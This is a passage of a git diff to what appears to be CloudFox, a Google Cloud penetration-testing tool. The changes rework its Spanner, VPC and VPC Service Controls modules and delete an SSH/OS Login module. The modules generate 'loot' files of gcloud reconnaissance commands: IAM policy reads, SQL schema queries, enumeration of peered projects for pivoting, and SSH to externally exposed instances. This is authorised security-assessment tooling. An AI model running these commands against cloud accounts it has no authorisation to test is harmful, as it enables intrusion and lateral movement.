-59,19 +67,18 @@ func (m *SpannerModule) Execute(ctx context.Context, logger internal.Logger) { return } - dbCount := 0 - for _, instance := range m.Instances { - dbCount += len(instance.Databases) - } - logger.SuccessM(fmt.Sprintf("Found %d Spanner instance(s) with %d database(s)", - len(m.Instances), dbCount), globals.GCP_SPANNER_MODULE_NAME) + len(m.Instances), len(m.Databases)), globals.GCP_SPANNER_MODULE_NAME) m.writeOutput(ctx, logger) } func (m *SpannerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Spanner in project: %s", projectID), globals.GCP_SPANNER_MODULE_NAME) + } + svc := spannerservice.New() - instances, err := svc.ListInstances(projectID) + result, err := svc.ListInstancesAndDatabases(projectID) if err != nil { m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, globals.GCP_SPANNER_MODULE_NAME, @@ -80,54 +87,225 @@ func (m *SpannerModule) processProject(ctx context.Context, projectID string, lo } m.mu.Lock() - m.Instances = append(m.Instances, instances...) - for _, instance := range instances { - m.addToLoot(instance) + m.Instances = append(m.Instances, result.Instances...) + m.Databases = append(m.Databases, result.Databases...) + + for _, instance := range result.Instances { + m.addInstanceToLoot(instance) + } + for _, database := range result.Databases { + m.addDatabaseToLoot(database) } m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d instance(s) and %d database(s) in project %s", + len(result.Instances), len(result.Databases), projectID), globals.GCP_SPANNER_MODULE_NAME) + } } func (m *SpannerModule) initializeLootFiles() { - m.LootMap["spanner-instances"] = &internal.LootFile{ - Name: "spanner-instances", - Contents: "# Spanner Instances and Databases\n# Generated by CloudFox\n\n", + m.LootMap["spanner-commands"] = &internal.LootFile{ + Name: "spanner-commands", + Contents: "# Spanner Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } -func (m *SpannerModule) addToLoot(instance spannerservice.SpannerInstanceInfo) { - m.LootMap["spanner-instances"].Contents += fmt.Sprintf( - "# Instance: %s (%s)\n# Databases: %s\n# Nodes: %d\n\n", - instance.Name, instance.DisplayName, - strings.Join(instance.Databases, ", "), - instance.NodeCount) +func (m *SpannerModule) addInstanceToLoot(instance spannerservice.SpannerInstanceInfo) { + m.LootMap["spanner-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# INSTANCE: %s\n"+ + "# ==========================================\n"+ + "# Project: %s\n"+ + "# Display Name: %s\n"+ + "# Config: %s\n"+ + "# Nodes: %d\n"+ + "# State: %s\n", + instance.Name, instance.ProjectID, + instance.DisplayName, instance.Config, + instance.NodeCount, instance.State, + ) + + if len(instance.IAMBindings) > 0 { + m.LootMap["spanner-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range instance.IAMBindings { + m.LootMap["spanner-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + m.LootMap["spanner-commands"].Contents += fmt.Sprintf( + "\n# Describe instance:\n"+ + "gcloud spanner instances describe %s --project=%s\n\n"+ + "# List databases:\n"+ + "gcloud spanner databases list --instance=%s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud spanner instances get-iam-policy %s --project=%s\n\n", + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + ) +} + +func (m *SpannerModule) addDatabaseToLoot(database spannerservice.SpannerDatabaseInfo) { + m.LootMap["spanner-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# DATABASE: %s (Instance: %s)\n"+ + "# ------------------------------------------\n"+ + "# Project: %s\n"+ + "# State: %s\n"+ + "# Encryption: %s\n", + database.Name, database.InstanceName, + database.ProjectID, database.State, + database.EncryptionType, + ) + + if database.KmsKeyName != "" { + m.LootMap["spanner-commands"].Contents += fmt.Sprintf("# KMS Key: %s\n", database.KmsKeyName) + } + + if len(database.IAMBindings) > 0 { + m.LootMap["spanner-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range database.IAMBindings { + m.LootMap["spanner-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + m.LootMap["spanner-commands"].Contents += fmt.Sprintf( + "\n# Describe database:\n"+ + "gcloud spanner databases describe %s --instance=%s --project=%s\n\n"+ + "# Get database IAM policy:\n"+ + "gcloud spanner databases get-iam-policy %s --instance=%s --project=%s\n\n"+ + "# Execute SQL query:\n"+ + "gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql=\"SELECT * FROM INFORMATION_SCHEMA.TABLES\"\n\n", + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + ) } func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) { - header := []string{"Name", "Display Name", "Config", "Nodes", "Databases", "State", "Project Name", "Project"} + // Instance table - one row per IAM binding + instanceHeader := []string{ + "Project Name", + "Project ID", + "Instance", + "Display Name", + "Config", + "Nodes", + "State", + "IAM Role", + "IAM Member", + } - var body [][]string + var instanceBody [][]string for _, instance := range m.Instances { - body = append(body, []string{ - instance.Name, - instance.DisplayName, - instance.Config, - fmt.Sprintf("%d", instance.NodeCount), - strings.Join(instance.Databases, ", "), - instance.State, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - }) + if len(instance.IAMBindings) > 0 { + for _, binding := range instance.IAMBindings { + instanceBody = append(instanceBody, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.DisplayName, + instance.Config, + fmt.Sprintf("%d", instance.NodeCount), + instance.State, + binding.Role, + binding.Member, + }) + } + } else { + // Instance with no IAM bindings + instanceBody = append(instanceBody, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.DisplayName, + instance.Config, + fmt.Sprintf("%d", instance.NodeCount), + instance.State, + "-", + "-", + }) + } + } + + // Database table - one row per IAM binding + databaseHeader := []string{ + "Project Name", + "Project ID", + "Instance", + "Database", + "State", + "Encryption", + "KMS Key", + "IAM Role", + "IAM Member", + } + + var databaseBody [][]string + for _, database := range m.Databases { + kmsKey := "-" + if database.KmsKeyName != "" { + kmsKey = database.KmsKeyName + } + + if len(database.IAMBindings) > 0 { + for _, binding := range database.IAMBindings { + databaseBody = append(databaseBody, []string{ + m.GetProjectName(database.ProjectID), + database.ProjectID, + database.InstanceName, + database.Name, + database.State, + database.EncryptionType, + kmsKey, + binding.Role, + binding.Member, + }) + } + } else { + // Database with no IAM bindings + databaseBody = append(databaseBody, []string{ + m.GetProjectName(database.ProjectID), + database.ProjectID, + database.InstanceName, + database.Name, + database.State, + database.EncryptionType, + kmsKey, + "-", + "-", + }) + } } + // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } + // Build tables + tables := []internal.TableFile{ + { + Name: "spanner-instances", + Header: instanceHeader, + Body: instanceBody, + }, + } + + if len(databaseBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "spanner-databases", + Header: databaseHeader, + Body: databaseBody, + }) + } + output := SpannerOutput{ - Table: []internal.TableFile{{Name: "spanner", Header: header, Body: body}}, + Table: tables, Loot: lootFiles, } @@ -136,6 +314,10 @@ func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) scopeNames[i] = m.GetProjectName(id) } - internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SPANNER_MODULE_NAME) + m.CommandCounter.Error++ + } } diff --git a/gcp/commands/sshoslogin.go b/gcp/commands/sshoslogin.go deleted file mode 100644 index 12865f88..00000000 --- a/gcp/commands/sshoslogin.go +++ /dev/null @@ -1,389 +0,0 @@ -package commands - -import ( - "context" - "fmt" - "strings" - "sync" - - sshosloginservice "github.com/BishopFox/cloudfox/gcp/services/sshOsLoginService" - "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - "github.com/spf13/cobra" -) - -var GCPSSHOsLoginCommand = &cobra.Command{ - Use: globals.GCP_SSHOSLOGIN_MODULE_NAME, - Aliases: []string{"ssh", "oslogin", "ssh-keys"}, - Short: "Enumerate SSH access and OS Login configuration", - Long: `Enumerate SSH access configuration across projects and instances. - -This module identifies: -- OS Login configuration (project and instance level) -- SSH keys in project metadata (accessible to all instances) -- SSH keys in instance metadata -- Instances accessible via SSH -- 2FA requirements for OS Login - -Security Analysis: -- Legacy SSH keys vs OS Login -- Project-wide SSH key exposure -- External IP + SSH access combinations -- Missing 2FA for OS Login - -Output: -- OS Login configuration per project -- SSH keys from metadata -- Instance SSH access details -- SSH commands for accessible instances`, - Run: runGCPSSHOsLoginCommand, -} - -// ------------------------------ -// Module Struct -// ------------------------------ -type SSHOsLoginModule struct { - gcpinternal.BaseGCPModule - - OSLoginConfigs []sshosloginservice.OSLoginConfig - SSHKeys []sshosloginservice.SSHKeyInfo - InstanceAccess []sshosloginservice.InstanceSSHAccess - LootMap map[string]*internal.LootFile - mu sync.Mutex -} - -// ------------------------------ -// Output Struct -// ------------------------------ -type SSHOsLoginOutput struct { - Table []internal.TableFile - Loot []internal.LootFile -} - -func (o SSHOsLoginOutput) TableFiles() []internal.TableFile { return o.Table } -func (o SSHOsLoginOutput) LootFiles() []internal.LootFile { return o.Loot } - -// ------------------------------ -// Command Entry Point -// ------------------------------ -func runGCPSSHOsLoginCommand(cmd *cobra.Command, args []string) { - cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SSHOSLOGIN_MODULE_NAME) - if err != nil { - return - } - - module := &SSHOsLoginModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - OSLoginConfigs: []sshosloginservice.OSLoginConfig{}, - SSHKeys: []sshosloginservice.SSHKeyInfo{}, - InstanceAccess: []sshosloginservice.InstanceSSHAccess{}, - LootMap: make(map[string]*internal.LootFile), - } - - module.initializeLootFiles() - module.Execute(cmdCtx.Ctx, cmdCtx.Logger) -} - -// ------------------------------ -// Module Execution -// ------------------------------ -func (m *SSHOsLoginModule) Execute(ctx context.Context, logger internal.Logger) { - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SSHOSLOGIN_MODULE_NAME, m.processProject) - - if len(m.InstanceAccess) == 0 && len(m.SSHKeys) == 0 { - logger.InfoM("No SSH access information found", globals.GCP_SSHOSLOGIN_MODULE_NAME) - return - } - - // Count instances with external IPs - externalCount := 0 - for _, access := range m.InstanceAccess { - if access.ExternalIP != "" { - externalCount++ - } - } - - logger.SuccessM(fmt.Sprintf("Found %d instance(s), %d SSH key(s), %d with external IPs", - len(m.InstanceAccess), len(m.SSHKeys), externalCount), globals.GCP_SSHOSLOGIN_MODULE_NAME) - - if len(m.SSHKeys) > 0 { - logger.InfoM("[PENTEST] SSH keys found in metadata - check for access!", globals.GCP_SSHOSLOGIN_MODULE_NAME) - } - - m.writeOutput(ctx, logger) -} - -// ------------------------------ -// Project Processor -// ------------------------------ -func (m *SSHOsLoginModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Enumerating SSH/OS Login in project: %s", projectID), globals.GCP_SSHOSLOGIN_MODULE_NAME) - } - - svc := sshosloginservice.New() - - // Get OS Login config - config, err := svc.GetProjectOSLoginConfig(projectID) - if err == nil && config != nil { - m.mu.Lock() - m.OSLoginConfigs = append(m.OSLoginConfigs, *config) - m.mu.Unlock() - } - - // Get project SSH keys - projectKeys, err := svc.GetProjectSSHKeys(projectID) - if err == nil { - m.mu.Lock() - m.SSHKeys = append(m.SSHKeys, projectKeys...) - for _, key := range projectKeys { - m.addSSHKeyToLoot(key) - } - m.mu.Unlock() - } - - // Get instance SSH access - instances, instanceKeys, err := svc.GetInstanceSSHAccess(projectID) - if err == nil { - m.mu.Lock() - m.InstanceAccess = append(m.InstanceAccess, instances...) - m.SSHKeys = append(m.SSHKeys, instanceKeys...) - - for _, access := range instances { - m.addInstanceAccessToLoot(access) - } - for _, key := range instanceKeys { - m.addSSHKeyToLoot(key) - } - m.mu.Unlock() - } - - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Found %d instance(s), %d SSH key(s) in project %s", - len(instances), len(projectKeys)+len(instanceKeys), projectID), globals.GCP_SSHOSLOGIN_MODULE_NAME) - } -} - -// ------------------------------ -// Loot File Management -// ------------------------------ -func (m *SSHOsLoginModule) initializeLootFiles() { - m.LootMap["ssh-commands"] = &internal.LootFile{ - Name: "ssh-commands", - Contents: "# SSH Commands for Instances\n# Generated by CloudFox\n\n", - } - m.LootMap["ssh-keys-found"] = &internal.LootFile{ - Name: "ssh-keys-found", - Contents: "# SSH Keys Found in Metadata\n# Generated by CloudFox\n# These keys grant access to instances\n\n", - } - m.LootMap["ssh-external-access"] = &internal.LootFile{ - Name: "ssh-external-access", - Contents: "# Instances with External SSH Access\n# Generated by CloudFox\n# Direct SSH targets from internet\n\n", - } -} - -func (m *SSHOsLoginModule) addSSHKeyToLoot(key sshosloginservice.SSHKeyInfo) { - source := "Project-wide" - if key.Source == "instance" { - source = fmt.Sprintf("Instance: %s", key.InstanceName) - } - - m.LootMap["ssh-keys-found"].Contents += fmt.Sprintf( - "## User: %s\n"+ - "## Key Type: %s\n"+ - "## Source: %s\n"+ - "## Project: %s\n", - key.Username, key.KeyType, source, key.ProjectID, - ) - - for _, cmd := range key.ExploitCommands { - m.LootMap["ssh-keys-found"].Contents += cmd + "\n" - } - m.LootMap["ssh-keys-found"].Contents += "\n" -} - -func (m *SSHOsLoginModule) addInstanceAccessToLoot(access sshosloginservice.InstanceSSHAccess) { - // SSH commands for all instances - m.LootMap["ssh-commands"].Contents += fmt.Sprintf( - "## Instance: %s (Project: %s)\n", - access.InstanceName, access.ProjectID, - ) - for _, cmd := range access.SSHCommands { - m.LootMap["ssh-commands"].Contents += cmd + "\n" - } - m.LootMap["ssh-commands"].Contents += "\n" - - // External access specifically - if access.ExternalIP != "" { - m.LootMap["ssh-external-access"].Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## External IP: %s\n"+ - "## Project: %s, Zone: %s\n"+ - "## OS Login: %v, Block Project Keys: %v\n", - access.RiskLevel, access.InstanceName, - access.ExternalIP, - access.ProjectID, access.Zone, - access.OSLoginEnabled, access.BlockProjectKeys, - ) - - if len(access.RiskReasons) > 0 { - for _, reason := range access.RiskReasons { - m.LootMap["ssh-external-access"].Contents += fmt.Sprintf("## - %s\n", reason) - } - } - - m.LootMap["ssh-external-access"].Contents += fmt.Sprintf( - "gcloud compute ssh %s --zone=%s --project=%s\n\n", - access.InstanceName, access.Zone, access.ProjectID, - ) - } -} - -// ------------------------------ -// Output Generation -// ------------------------------ -func (m *SSHOsLoginModule) writeOutput(ctx context.Context, logger internal.Logger) { - var tables []internal.TableFile - - // OS Login Config table - if len(m.OSLoginConfigs) > 0 { - configHeader := []string{ - "Project Name", - "Project", - "OS Login", - "2FA Required", - "Block Project Keys", - "Risk", - } - - var configBody [][]string - for _, config := range m.OSLoginConfigs { - configBody = append(configBody, []string{ - m.GetProjectName(config.ProjectID), - config.ProjectID, - boolToYesNo(config.OSLoginEnabled), - boolToYesNo(config.OSLogin2FAEnabled), - boolToYesNo(config.BlockProjectSSHKeys), - config.RiskLevel, - }) - } - - tables = append(tables, internal.TableFile{ - Name: "oslogin-config", - Header: configHeader, - Body: configBody, - }) - } - - // Instance SSH Access table - if len(m.InstanceAccess) > 0 { - accessHeader := []string{ - "Instance", - "External IP", - "Internal IP", - "OS Login", - "SSH Keys", - "Risk", - "Zone", - "Project Name", - "Project", - } - - var accessBody [][]string - for _, access := range m.InstanceAccess { - externalIP := access.ExternalIP - if externalIP == "" { - externalIP = "-" - } - - accessBody = append(accessBody, []string{ - access.InstanceName, - externalIP, - access.InternalIP, - boolToYesNo(access.OSLoginEnabled), - fmt.Sprintf("%d", access.SSHKeysCount), - access.RiskLevel, - access.Zone, - m.GetProjectName(access.ProjectID), - access.ProjectID, - }) - } - - tables = append(tables, internal.TableFile{ - Name: "ssh-instance-access", - Header: accessHeader, - Body: accessBody, - }) - } - - // SSH Keys table - if len(m.SSHKeys) > 0 { - keysHeader := []string{ - "Username", - "Key Type", - "Source", - "Instance", - "Project Name", - "Project", - } - - var keysBody [][]string - for _, key := range m.SSHKeys { - instance := "-" - if key.InstanceName != "" { - instance = key.InstanceName - } - - keysBody = append(keysBody, []string{ - key.Username, - key.KeyType, - key.Source, - instance, - m.GetProjectName(key.ProjectID), - key.ProjectID, - }) - } - - tables = append(tables, internal.TableFile{ - Name: "ssh-keys", - Header: keysHeader, - Body: keysBody, - }) - } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - output := SSHOsLoginOutput{ - Table: tables, - Loot: lootFiles, - } - - scopeNames := make([]string, len(m.ProjectIDs)) - for i, projectID := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(projectID) - } - - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SSHOSLOGIN_MODULE_NAME) - m.CommandCounter.Error++ - } -} diff --git a/gcp/commands/vpcnetworks.go b/gcp/commands/vpcnetworks.go index 7b4de9d1..934f31eb 100644 --- a/gcp/commands/vpcnetworks.go +++ b/gcp/commands/vpcnetworks.go @@ -134,63 +134,91 @@ func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string } func (m *VPCNetworksModule) initializeLootFiles() { - m.LootMap["vpc-networks"] = &internal.LootFile{ - Name: "vpc-networks", - Contents: "# VPC Networks\n# Generated by CloudFox\n\n", - } - m.LootMap["subnet-cidrs"] = &internal.LootFile{ - Name: "subnet-cidrs", - Contents: "", - } - m.LootMap["vpc-lateral-movement"] = &internal.LootFile{ - Name: "vpc-lateral-movement", - Contents: "# VPC Lateral Movement Paths\n# Generated by CloudFox\n# Cross-project VPC peerings for network pivoting\n\n", - } - m.LootMap["vpc-peering-commands"] = &internal.LootFile{ - Name: "vpc-peering-commands", - Contents: "# VPC Peering Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + m.LootMap["vpcnetworks-commands"] = &internal.LootFile{ + Name: "vpcnetworks-commands", + Contents: "# VPC Networks Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *VPCNetworksModule) addNetworkToLoot(network vpcservice.VPCNetworkInfo) { - m.LootMap["vpc-networks"].Contents += fmt.Sprintf( - "# Network: %s\n# Routing: %s\n# Subnets: %d\n# Peerings: %d\n\n", - network.Name, network.RoutingMode, len(network.Subnetworks), len(network.Peerings)) + m.LootMap["vpcnetworks-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# NETWORK: %s\n"+ + "# ==========================================\n"+ + "# Project: %s\n"+ + "# Routing Mode: %s\n"+ + "# Auto Create Subnets: %v\n"+ + "# Subnets: %d\n"+ + "# Peerings: %d\n"+ + "\n# Describe network:\n"+ + "gcloud compute networks describe %s --project=%s\n\n"+ + "# List subnets in network:\n"+ + "gcloud compute networks subnets list --network=%s --project=%s\n\n"+ + "# List peerings:\n"+ + "gcloud compute networks peerings list --network=%s --project=%s\n\n", + network.Name, + network.ProjectID, + network.RoutingMode, + network.AutoCreateSubnetworks, + len(network.Subnetworks), + len(network.Peerings), + network.Name, network.ProjectID, + network.Name, network.ProjectID, + network.Name, network.ProjectID, + ) } func (m *VPCNetworksModule) addSubnetToLoot(subnet vpcservice.SubnetInfo) { - m.LootMap["subnet-cidrs"].Contents += fmt.Sprintf("%s # %s/%s\n", - subnet.IPCidrRange, subnet.Network, subnet.Name) + m.LootMap["vpcnetworks-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# SUBNET: %s (Network: %s)\n"+ + "# ------------------------------------------\n"+ + "# Project: %s\n"+ + "# Region: %s\n"+ + "# CIDR: %s\n"+ + "# Private Google Access: %v\n"+ + "# Flow Logs: %v\n"+ + "\n# Describe subnet:\n"+ + "gcloud compute networks subnets describe %s --region=%s --project=%s\n\n", + subnet.Name, subnet.Network, + subnet.ProjectID, + subnet.Region, + subnet.IPCidrRange, + subnet.PrivateIPGoogleAccess, + subnet.EnableFlowLogs, + subnet.Name, subnet.Region, subnet.ProjectID, + ) } func (m *VPCNetworksModule) addPeeringToLoot(peering vpcservice.VPCPeeringInfo) { - // Add lateral movement paths - if peering.LateralMovementPath { - m.LootMap["vpc-lateral-movement"].Contents += fmt.Sprintf( - "## [%s] %s -> %s\n"+ - "## Source Project: %s\n"+ - "## Target Project: %s\n"+ - "## State: %s\n", - peering.RiskLevel, peering.Network, peering.PeerNetwork, - peering.ProjectID, peering.PeerProjectID, - peering.State, - ) - for _, reason := range peering.RiskReasons { - m.LootMap["vpc-lateral-movement"].Contents += fmt.Sprintf("## - %s\n", reason) - } - m.LootMap["vpc-lateral-movement"].Contents += "\n" - } - - // Add exploitation commands - if len(peering.ExploitCommands) > 0 { - m.LootMap["vpc-peering-commands"].Contents += fmt.Sprintf( - "## [%s] Peering: %s (Project: %s)\n", - peering.RiskLevel, peering.Name, peering.ProjectID, + m.LootMap["vpcnetworks-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# PEERING: %s\n"+ + "# ------------------------------------------\n"+ + "# Project: %s\n"+ + "# Network: %s -> Peer Network: %s\n"+ + "# Peer Project: %s\n"+ + "# State: %s\n"+ + "# Export Routes: %v, Import Routes: %v\n", + peering.Name, + peering.ProjectID, + peering.Network, peering.PeerNetwork, + peering.PeerProjectID, + peering.State, + peering.ExportCustomRoutes, peering.ImportCustomRoutes, + ) + + // Cross-project peering commands + if peering.PeerProjectID != "" && peering.PeerProjectID != peering.ProjectID { + m.LootMap["vpcnetworks-commands"].Contents += fmt.Sprintf( + "\n# Cross-project peering - enumerate peer project:\n"+ + "gcloud compute instances list --project=%s\n"+ + "gcloud compute networks subnets list --project=%s\n\n", + peering.PeerProjectID, + peering.PeerProjectID, ) - for _, cmd := range peering.ExploitCommands { - m.LootMap["vpc-peering-commands"].Contents += cmd + "\n" - } - m.LootMap["vpc-peering-commands"].Contents += "\n" + } else { + m.LootMap["vpcnetworks-commands"].Contents += "\n" } } @@ -198,7 +226,7 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log var tables []internal.TableFile // Networks table - netHeader := []string{"Name", "Routing Mode", "Auto Subnets", "Subnets", "Peerings", "Risk", "Project Name", "Project"} + netHeader := []string{"Project Name", "Project ID", "Name", "Routing Mode", "Auto Subnets", "Subnets", "Peerings"} var netBody [][]string for _, network := range m.Networks { autoSubnets := "No" @@ -206,14 +234,13 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log autoSubnets = "Yes" } netBody = append(netBody, []string{ + m.GetProjectName(network.ProjectID), + network.ProjectID, network.Name, network.RoutingMode, autoSubnets, fmt.Sprintf("%d", len(network.Subnetworks)), fmt.Sprintf("%d", len(network.Peerings)), - network.RiskLevel, - m.GetProjectName(network.ProjectID), - network.ProjectID, }) } tables = append(tables, internal.TableFile{ @@ -224,7 +251,7 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log // Subnets table if len(m.Subnets) > 0 { - subHeader := []string{"Name", "Network", "Region", "CIDR", "Private Access", "Flow Logs", "Risk", "Project Name", "Project"} + subHeader := []string{"Project Name", "Project ID", "Name", "Network", "Region", "CIDR", "Private Access", "Flow Logs"} var subBody [][]string for _, subnet := range m.Subnets { privateAccess := "No" @@ -236,15 +263,14 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log flowLogs = "Yes" } subBody = append(subBody, []string{ + m.GetProjectName(subnet.ProjectID), + subnet.ProjectID, subnet.Name, subnet.Network, subnet.Region, subnet.IPCidrRange, privateAccess, flowLogs, - subnet.RiskLevel, - m.GetProjectName(subnet.ProjectID), - subnet.ProjectID, }) } tables = append(tables, internal.TableFile{ @@ -256,27 +282,31 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log // Peerings table if len(m.Peerings) > 0 { - peerHeader := []string{"Name", "Network", "Peer Network", "Peer Project", "State", "Lateral Move", "Risk", "Project Name", "Project"} + peerHeader := []string{"Project Name", "Project ID", "Name", "Network", "Peer Network", "Peer Project", "State", "Export Routes", "Import Routes"} var peerBody [][]string for _, peering := range m.Peerings { - lateralMove := "No" - if peering.LateralMovementPath { - lateralMove = "YES" - } peerProject := peering.PeerProjectID if peerProject == "" { peerProject = "-" } + exportRoutes := "No" + if peering.ExportCustomRoutes { + exportRoutes = "Yes" + } + importRoutes := "No" + if peering.ImportCustomRoutes { + importRoutes = "Yes" + } peerBody = append(peerBody, []string{ + m.GetProjectName(peering.ProjectID), + peering.ProjectID, peering.Name, peering.Network, peering.PeerNetwork, peerProject, peering.State, - lateralMove, - peering.RiskLevel, - m.GetProjectName(peering.ProjectID), - peering.ProjectID, + exportRoutes, + importRoutes, }) } tables = append(tables, internal.TableFile{ @@ -294,18 +324,18 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log } } if len(customRoutes) > 0 { - routeHeader := []string{"Name", "Network", "Dest Range", "Next Hop Type", "Next Hop", "Priority", "Project Name", "Project"} + routeHeader := []string{"Project Name", "Project ID", "Name", "Network", "Dest Range", "Next Hop Type", "Next Hop", "Priority"} var routeBody [][]string for _, route := range customRoutes { routeBody = append(routeBody, []string{ + m.GetProjectName(route.ProjectID), + route.ProjectID, route.Name, route.Network, route.DestRange, route.NextHopType, route.NextHop, fmt.Sprintf("%d", route.Priority), - m.GetProjectName(route.ProjectID), - route.ProjectID, }) } tables = append(tables, internal.TableFile{ @@ -317,7 +347,7 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/vpcsc.go b/gcp/commands/vpcsc.go index 16906d3b..5e4717d5 100644 --- a/gcp/commands/vpcsc.go +++ b/gcp/commands/vpcsc.go @@ -64,23 +64,33 @@ func runGCPVPCSCCommand(cmd *cobra.Command, args []string) { // Auto-discover org ID if not provided effectiveOrgID := orgID if effectiveOrgID == "" { - if len(cmdCtx.ProjectIDs) == 0 { - cmdCtx.Logger.ErrorM("No projects discovered and no --org flag provided. Cannot determine organization.", globals.GCP_VPCSC_MODULE_NAME) - return + cmdCtx.Logger.InfoM("Auto-discovering organization ID...", globals.GCP_VPCSC_MODULE_NAME) + orgsSvc := orgsservice.New() + + // Method 1: Try to get org ID from project ancestry + if len(cmdCtx.ProjectIDs) > 0 { + discoveredOrgID, err := orgsSvc.GetOrganizationIDFromProject(cmdCtx.ProjectIDs[0]) + if err == nil { + effectiveOrgID = discoveredOrgID + cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered organization ID from project ancestry: %s", effectiveOrgID), globals.GCP_VPCSC_MODULE_NAME) + } } - cmdCtx.Logger.InfoM("Auto-discovering organization ID from project ancestry...", globals.GCP_VPCSC_MODULE_NAME) - orgsSvc := orgsservice.New() + // Method 2: Fallback to searching for accessible organizations + if effectiveOrgID == "" { + orgs, err := orgsSvc.SearchOrganizations() + if err == nil && len(orgs) > 0 { + // Extract org ID from name (format: "organizations/ORGID") + effectiveOrgID = strings.TrimPrefix(orgs[0].Name, "organizations/") + cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered organization ID from search: %s (%s)", effectiveOrgID, orgs[0].DisplayName), globals.GCP_VPCSC_MODULE_NAME) + } + } - // Try to get org ID from the first project - discoveredOrgID, err := orgsSvc.GetOrganizationIDFromProject(cmdCtx.ProjectIDs[0]) - if err != nil { - cmdCtx.Logger.ErrorM(fmt.Sprintf("Could not auto-discover organization ID: %v. Use --org flag to specify.", err), globals.GCP_VPCSC_MODULE_NAME) + // If still no org ID found, error out + if effectiveOrgID == "" { + cmdCtx.Logger.ErrorM("Could not auto-discover organization ID. Use --org flag to specify.", globals.GCP_VPCSC_MODULE_NAME) return } - - effectiveOrgID = discoveredOrgID - cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered organization ID: %s", effectiveOrgID), globals.GCP_VPCSC_MODULE_NAME) } module := &VPCSCModule{ @@ -142,26 +152,82 @@ func (m *VPCSCModule) Execute(ctx context.Context, logger internal.Logger) { } func (m *VPCSCModule) initializeLootFiles() { - m.LootMap["vpcsc-perimeters"] = &internal.LootFile{ - Name: "vpcsc-perimeters", - Contents: "# VPC Service Control Perimeters\n# Generated by CloudFox\n\n", - } - m.LootMap["vpcsc-protected-projects"] = &internal.LootFile{ - Name: 